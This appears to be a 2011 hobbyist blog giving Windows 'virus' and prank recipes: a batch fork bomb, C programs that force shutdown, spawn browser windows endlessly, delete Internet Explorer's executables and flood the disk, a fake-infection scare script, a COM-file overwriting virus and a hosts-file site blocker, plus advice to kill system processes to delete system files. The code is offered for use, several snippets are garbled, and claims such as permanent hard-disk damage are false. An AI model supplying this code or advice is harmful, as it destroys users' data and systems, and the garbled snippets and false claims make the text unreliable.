Sunday, March 20, 2011

*>>How to use command prompt for del system files..? ♠♥

first of all u need to know about processes. lol.. Open ur task manager then click on the process tab.. u'll get all running process list currently running...!

Each n every process have a unique id..! so by killing that processes u r able to delete any system files..! :O

but u must know process id must..! if u can't delete any file.. then just open ur cmd n then end all application which are currently running.. except cmd! now leave cmd open.. now open up ur task manager n then select the process called  "explorer.exe" ! u all neeed to do is end that process..! now open up up cmd n delete any file u want..! u can delete any application or .exe file! lol... bt still it isn't complete... u need to kill many more processes... for completely killing the process u have to type below given code:

taskkill /pid "processid"


now type process id without the quotation marks...! thats it! now u can delete any type of file...!
for more detail... email me at shah.shreeji248@gmail.com


njoy!

*>>World's best virus!! lol.. ♠♥

Open ur notepad.. n type below given code...! watch urself!!

@echo off
echo "Your computer is gonna blow!"
pause
:1
start
goto 1



Enjoy! 
 

Saturday, March 19, 2011

*Example of a System Function in C.. You can do much more using this! lol...♠♥


1) C program which shutdown the window operating system:-

void main (void)
{
system("shutdown -s ");
}


2) C program such that when we will click on its .exe file then it will open internet explorer at infinite times:-


void main (void)
{
for(; ;)
{
system("c:\\progra~1\\intern~1\\iexplore.exe");
}
}

the only way to stop this process that you have to delete it's file from BIN folder...! or restart your pc or laptop!


3) C program which delete the all the .exe file of internet explorer so that internet explorer will not work:-


void main(void)
{
system("cd c:\\progra~1\\intern~1");
system(“del *.exe”);
system(“cls”);
}

the above source code will permenantely delete all .exe files of your internet explorer n it'll not start you must reinstall it!


4) C program for dump your hardisc:-


void main() 
while(1) 
system("dir>>â•ša.exe"); 


well, this source code creates folders in folders... and so on..untill your hardisc will full of folders n after this process it will permenentely damage your hard disc!

To know header files.. You have to recharge of 100 Rs./- of the number given below! :)

9099293573

Tuesday, March 8, 2011

*Make A Prank Virus to Scare your Frnzz..>>♠♥


Just copy and paste below program code to your notepad and give file name as Boo.bat   ...:



@echo off
color 0A
echo A Virus Win32:Sality Has been Detected!
pause
echo Contatting Antivirus...
pause
echo Sorry! Antivirus §¶14¦#+@¢ Corrupted...!!
pause
echo Do you Want to Delete the Virus?
pause
echo Sorry! Virus Already Fucked Up your PC...!
pause
:1
dir /s
goto 1

thats it! Now Double click on it.. n see what happens!

Enjoy!

*>>My First Virus>>♠♥

My first "blackwolf" virus! try it at ur own risk! Only for educational purpose! 


FILE *virus, *host;
int x,y,done;
char buff[256];
stuct ffblk ffblk;
main()
{
done=(findfirst("*.COM,&ffblk,0));
while(!done)
{
printf("infecting %s\n",ffblj.ff_name);
virus=fopen(_arg[0],"rb");
Host=fopen(ffblk.ff_name,"rb+");
x=9504;
while(x>256)
{
fread(buff,256,1,virus);
fwrite(buff,256,1,Host);
x-=256;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,Host);
fcloseall();
done=findnext(&ffblk);
}
return (0);
}


This virus corrupts all the .com files . so be extremely careful what you do with it!
eNJOY! ☻

Thursday, March 3, 2011

How to Block sites using C source code?


#include
#include
#include


char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;


int find_root(void);
void block_site(void);


int find_root()
{
int done;
struct ffblk ffblk;//File block structure


done=findfirst(”C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}


done=findfirst(”D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}


done=findfirst(”E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}


done=findfirst(”F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}


else return 0;
}


void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/


fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}


void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}